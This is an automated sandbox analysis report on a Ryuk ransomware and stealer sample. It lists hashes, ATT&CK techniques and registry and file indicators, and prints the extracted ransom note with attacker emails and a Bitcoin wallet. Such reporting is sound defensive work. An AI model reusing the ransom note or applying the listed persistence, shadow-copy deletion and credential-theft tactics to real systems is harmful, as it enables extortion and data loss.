ryuk | 3b21b98d92725cfd4d253b0022bd2cc1bba910e0ce928a94fa970cc9bca5a992

Analysis

max time kernel
79s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-01-2025 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe
Size

378KB
MD5

7bcbd03a264f616bcbf64dd973c9e120
SHA1

5d2b6c04f634672ba0a11063dd1bc225446af2c2
SHA256

8f6bddd131f27472a4b974c3a141f8eba3a2c110b4b19d755408f67aed212b68
SHA512

f5b1dc62441d9bfdb57a7ae6ef41c46106e510ba73cea8372cc0a2765c192d27dc3f41c1dfadadcaaa39ff4fd87b0c84b81ecd3b14c8315edeca3dd0a8789242
SSDEEP

6144:sMfwnT2W/Pw5qjylH1/7QXMWibyJp/qQ:snTzPqHkiuX

Score

10^/10

ryuk defense_evasion discovery execution impact persistence ransomware spyware stealer

Malware Config

Extracted

Path

F:\RyukReadMe.txt

Family

ryuk

Ransom Note

Gentlemen! Your business is at serious risk. There is a significant hole in the security system of your company. We've easily penetrated your network. You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc.)). You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5 BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future + we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We don`t need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. contact emails [email protected] or [email protected] BTC wallet: 1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz Ryuk No system is safe

Emails

[email protected]

Wallets

1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Ryuk family
ryuk
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	vVGbi.exe

Deletes itself 1 IoCs

pid	Process
848	vVGbi.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	sihost.exe

Executes dropped EXE 1 IoCs

pid	Process
848	vVGbi.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\users\\Public\\vVGbi.exe"	reg.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGIB.TTF	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\FRSCRIPT.TTF	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\share.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pl_135x40.svg	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\fontconfig.bfc	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\DESIGNER\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugin.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\organize.svg	svchost.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngom.md	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\THMBNAIL.PNG	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\ui-strings.js	svchost.exe
File opened for modification	C:\Program Files\PublishOpen.xltx	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac	sihost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\currency.data	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\license.txt	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main.css	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-140.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\am.pak	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-pl.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Grace-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\he-il\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_unselected_18.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\excelmui.msi.16.en-us.vreg.dat	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\zh_CN\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH.HXS	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\TPN.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241007091437.pma	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\McePerfCtr.man	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\RyukReadMe.txt	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js	sihost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe

Checks SCSI registry key(s) 3 TTPs 36 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe

Interacts with shadow copies 3 TTPs 28 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1520	vssadmin.exe
9720	vssadmin.exe
11380	vssadmin.exe
11496	vssadmin.exe
23504	vssadmin.exe
3644	vssadmin.exe
9584	vssadmin.exe
4512	vssadmin.exe
4216	vssadmin.exe
11424	vssadmin.exe
23280	vssadmin.exe
23440	vssadmin.exe
1800	vssadmin.exe
9500	vssadmin.exe
4016	vssadmin.exe
26580	vssadmin.exe
4604	vssadmin.exe
1008	vssadmin.exe
720	vssadmin.exe
23540	vssadmin.exe
9952	vssadmin.exe
10036	vssadmin.exe
1188	vssadmin.exe
3904	vssadmin.exe
2384	vssadmin.exe
11344	vssadmin.exe
11536	vssadmin.exe
9980	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

pid	Process
2332	taskkill.exe
1916	taskkill.exe
1036	taskkill.exe
228	taskkill.exe
3452	taskkill.exe
2912	taskkill.exe
2900	taskkill.exe
2684	taskkill.exe
2396	taskkill.exe
3696	taskkill.exe
3832	taskkill.exe
1184	taskkill.exe
2684	taskkill.exe
4532	taskkill.exe
2712	taskkill.exe
3136	taskkill.exe
3508	taskkill.exe
4828	taskkill.exe
1300	taskkill.exe
4312	taskkill.exe
1188	taskkill.exe
644	taskkill.exe
4756	taskkill.exe
1676	taskkill.exe
364	taskkill.exe
3748	taskkill.exe
2924	taskkill.exe
64	taskkill.exe
2508	taskkill.exe
716	taskkill.exe
1008	taskkill.exe
2400	taskkill.exe
452	taskkill.exe
2336	taskkill.exe
2284	taskkill.exe
3788	taskkill.exe
2104	taskkill.exe
4764	taskkill.exe
3296	taskkill.exe
2744	taskkill.exe
2676	taskkill.exe
4064	taskkill.exe
4216	taskkill.exe
1884	taskkill.exe

Modifies registry class 27 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2878641211-696417878-3864914810-1000\{BFD3F41F-A545-4F8B-A33A-E883C6D42D15}	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2878641211-696417878-3864914810-1000\{9C47BC70-F945-4AA7-B629-23E6BC1B5D7B}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
